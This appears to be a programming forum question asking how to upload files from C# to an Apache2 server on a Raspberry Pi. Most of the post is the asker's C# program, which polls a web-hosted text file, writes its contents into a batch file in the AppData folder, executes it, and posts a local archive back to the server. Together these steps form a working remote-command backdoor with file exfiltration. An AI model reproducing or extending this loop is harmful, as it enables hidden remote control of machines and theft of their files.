# How do i send a file to an Apache2 website using C#?

Tags: c#

So, i made some code in C#, that checks what's inside a file on a certain website.
When it detects a change inside that file, it will execute some command.
Now i'm thinking, is there a way to send some files back to the website?
The website is hosted using Apache2 on a Raspberry Pi.
Here's the code i got:

```cs
using System;
using System.Net;
using System.IO;
using System.Threading;

namespace HttpGet
{
    class Program
    {
        static void Main(string[] args)
        {
            string lastdata = "nice";
            int strtp = 0;
            string PCName = Environment.MachineName.ToString();
            while (true)
            {
                Console.WriteLine("try..");

                var uri = new Uri("http://192.168.1.76/comm.txt");

                HttpWebRequest request = (HttpWebRequest)WebRequest.Create(uri);

                using var response = (HttpWebResponse)request.GetResponse();
                using var stream = response.GetResponseStream();
                using var reader = new StreamReader(stream);

                var data = reader.ReadToEnd();
                if ((lastdata != data) || (strtp == 0))
                {
                    Console.WriteLine("New data:");
                    Console.WriteLine(data);
                    lastdata = data;
                    string appdata = Environment.ExpandEnvironmentVariables("%appdata%");
                    string path = appdata + @"\temp\temp.bat";
                    string pathfold = appdata + @"\temp";
                    string createText = data; ;
                    if (!Directory.Exists(pathfold))
                    {
                        Directory.CreateDirectory(pathfold);
                    }
                    using (StreamWriter writer = new StreamWriter(path))
                    {
                        writer.WriteLine(createText);
                    }
                    System.Diagnostics.Process.Start(path);
                    if(strtp == 0)
                    {
                        strtp = 1;
                        lastdata = data;
                    }
                    using (WebClient client = new WebClient())
                    {
                        client.Headers.Add("Content-Type", "application/octet-stream");
                        using (Stream fileStream = File.OpenRead(@"C:\Users\JEREDEK\Desktop\2\1.rar"))
                        using (Stream requestStream = client.OpenWrite(new Uri("http://192.168.1.76/stuff"), "POST"))
                        {
                            fileStream.CopyTo(requestStream);
                        }
                    }
                }
                else
                {
                    Console.WriteLine("Nothing new.");
                }
                Thread.Sleep(3000);
            }
        }
    }
}
```

I use Visual studio 2019 i it matters.

Comment: What do you mean "back to the website?"  Do you mean putting the files back in the filespace where the server can access them?  Or do you mean have your program emit HTML that somehow gets passed along to the browser?  Or something else?